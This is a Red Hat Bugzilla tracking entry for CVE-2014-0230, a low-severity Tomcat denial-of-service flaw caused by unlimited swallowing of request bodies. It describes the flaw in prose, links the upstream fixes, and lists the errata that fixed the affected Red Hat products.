Bug 1191200 (CVE-2014-0230)

Summary: CVE-2014-0230 tomcat: non-persistent DoS attack by feeding data by aborting an upload
Product: [Other] Security Response Reporter: Vasyl Kaigorodov <vkaigoro>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: NEW --- QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: aileenc, alazarot, alee, asantos, aszczucz, bbaranow, bdawidow, bmaxwell, brms-jira, ccoleman, cdewolf, chazlett, coolsvap, dandread, darran.lofthouse, dmcphers, epp-bugs, etirelli, fnasser, gnaik, grocha, gvarsami, huwang, ivan.afonichev, jason.greene, java-sig-commits, jawilson, jboss-set, jbpapp-maint, jclere, jcoleman, jdg-bugs, jdoyle, jialiu, joelsmith, jokerman, jolee, jpallich, jrusnack, jshepherd, kconner, krzysztof.daniel, ldimaggi, lgao, lmeyer, lpetrovi, mbabacek, mbaluch, mmccomas, mweiler, mwinkler, myarboro, nwallace, pcheung, pgier, psakar, pslavice, rhq-maint, rrajasek, rsvoboda, rwagner, rzhang, security-response-team, soa-p-jira, spinder, tcunning, theute, tkirby, ttarrant, twalsh, vhalbert, vtunka, weli
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard: impact=low,public=20140719,reported=20150210,source=upstream,cvss2=5/AV:N/AC:L/Au:N/C:N/I:N/A:P,cwe=CWE-770,brms-5/jbossweb=new,eap-4/jbossweb=wontfix,eap-5/jbossweb=wontfix,eap-6/jbossweb=affected,epel-6/tomcat=affected,fedora-all/tomcat=notaffected,fsw-6/jbossweb=new,jbews-1/tomcat5=wontfix,jbews-1/tomcat6=wontfix,jbews-2/tomcat6=affected,jbews-2/tomcat7=affected,jbews-3/tomcat7=affected,jbews-3/tomcat8=affected,jdg-6/jbossweb=affected,jdv-6/jbossweb=affected,jon-3/jbossweb=affected,jpp-6/jbossweb=affected,openshift-1/jbossweb=wontfix,rhel-5/tomcat5=wontfix,rhel-6/tomcat6=notaffected,rhel-7/tomcat=affected,soap-4/jbossweb=wontfix,soap-5/jbossweb=wontfix
Fixed In Version: tomcat 6.0.44, tomcat 7.0.55, tomcat 8.0.9 Doc Type: Bug Fix
Doc Text:
It was found that Tomcat would keep connections open after processing requests with a large enough request body. A remote attacker could potentially use this flaw to exhaust the pool of available connections and preventing further, legitimate connections to the Tomcat server to be made.
Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Bug Depends On: 1227592, 1227593, 1236893, 1236899, 1236905, 1236910, 1236915, 1236920, 1259358, 1259359, 1352004    
Bug Blocks: 1191201, 1253310    

Description Vasyl Kaigorodov 2015-02-10 16:38:32 UTC
When a response for a request with a request body is returned to the user agent before the request body is fully read, by default Tomcat swallows the remaining request body so that the next request on the connection may be processed. There was no limit to the size of request body that Tomcat would swallow. This permitted a limited Denial of Service as Tomcat would never close the connection and a processing thread would remain allocated to the connection.

Upstream fix:

http://svn.apache.org/viewvc?view=revision&revision=1603781
http://svn.apache.org/viewvc?view=revision&revision=1603811
http://svn.apache.org/viewvc?view=revision&revision=1609176
http://svn.apache.org/viewvc?view=revision&revision=1659295

Comment 7 Jason Shepherd 2015-06-29 04:21:58 UTC
I tested this vulnerability against the version of Tomcat6 shipped with RHEL 6.6 and found it to be unaffected. I'm updating the whiteboard to reflect that.

Comment 11 Jason Shepherd 2015-06-30 02:15:32 UTC
Created tomcat tracking bugs for this issue:

Affects: epel-6 [bug 1236920]

Comment 13 errata-xmlrpc 2015-08-13 15:29:45 UTC
This issue has been addressed in the following products:

  JBEWS 2 for RHEL 7
  JBEWS 2 for RHEL 6
  JBEWS 2 for RHEL 5

Via RHSA-2015:1622 https://rhn.redhat.com/errata/RHSA-2015-1622.html

Comment 14 errata-xmlrpc 2015-08-13 15:31:10 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Web Server 2.1.0

Via RHSA-2015:1621 https://rhn.redhat.com/errata/RHSA-2015-1621.html

Comment 19 errata-xmlrpc 2015-12-16 18:21:21 UTC
This issue has been addressed in the following products:

  JBoss Web Server 3.0.2

Via RHSA-2015:2661 https://rhn.redhat.com/errata/RHSA-2015-2661.html

Comment 20 errata-xmlrpc 2015-12-16 18:22:02 UTC
This issue has been addressed in the following products:

  JWS 3.0 for RHEL 7

Via RHSA-2015:2660 https://access.redhat.com/errata/RHSA-2015:2660

Comment 21 errata-xmlrpc 2015-12-16 18:22:45 UTC
This issue has been addressed in the following products:

  JWS 3.0 for RHEL 6

Via RHSA-2015:2659 https://access.redhat.com/errata/RHSA-2015:2659

Comment 22 errata-xmlrpc 2016-04-05 20:41:09 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0598 https://rhn.redhat.com/errata/RHSA-2016-0598.html

Comment 23 errata-xmlrpc 2016-04-05 20:42:34 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 7

Via RHSA-2016:0597 https://rhn.redhat.com/errata/RHSA-2016-0597.html

Comment 24 errata-xmlrpc 2016-04-05 20:43:39 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0596 https://rhn.redhat.com/errata/RHSA-2016-0596.html

Comment 25 errata-xmlrpc 2016-04-05 20:44:42 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 5

Via RHSA-2016:0595 https://rhn.redhat.com/errata/RHSA-2016-0595.html

Comment 26 errata-xmlrpc 2016-04-05 22:21:01 UTC
This issue has been addressed in the following products:



Via RHSA-2016:0599 https://rhn.redhat.com/errata/RHSA-2016-0599.html

Comment 27 errata-xmlrpc 2016-04-28 17:41:56 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0596 https://rhn.redhat.com/errata/RHSA-2016-0596.html

Comment 28 errata-xmlrpc 2016-04-28 17:42:30 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 5

Via RHSA-2016:0595 https://rhn.redhat.com/errata/RHSA-2016-0595.html

Comment 29 Tomas Hoger 2018-09-27 11:47:05 UTC
The tomcat packages in Red Hat Enterprise Linux 7 were updated to the fixed upstream version via the following erratum, released as part of the Red Hat Enterprise Linux 7.3.

https://access.redhat.com/errata/RHSA-2016:2599